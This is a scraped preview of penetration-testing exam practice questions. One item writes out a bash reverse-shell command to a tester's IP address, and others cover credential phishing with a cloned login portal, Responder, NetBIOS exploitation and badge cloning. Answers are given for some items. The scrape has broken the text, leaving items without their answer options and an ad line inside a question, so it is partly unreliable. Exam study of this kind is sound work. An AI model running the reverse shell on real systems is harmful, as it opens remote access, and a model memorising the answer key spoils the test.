While engaging clients for a penetration test from highly regulated industries

While engaging clients for a penetration test from

This preview shows page 24 - 27 out of 28 pages.

45.While engaging clients for a penetration test from highly regulated industries, which of the following is
The safer , easier way to help you pass any IT exams.usually the MOST important to the clients from a business perspective? 24/ 2646.A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1 Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful? 47.An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials. Which of the following types of attacks is this an example of? 48.During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests? A. Ettercap B. Tcpdump C. Responder D. Medusa Answer:C 49.A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?
25/ 2650.A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s. For which of the following types of attack would this information be used? 51.A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service? 52.Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this? A. Badge cloning B. Lock picking C. Tailgating D. Piggybacking Answer:A Explanation:

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture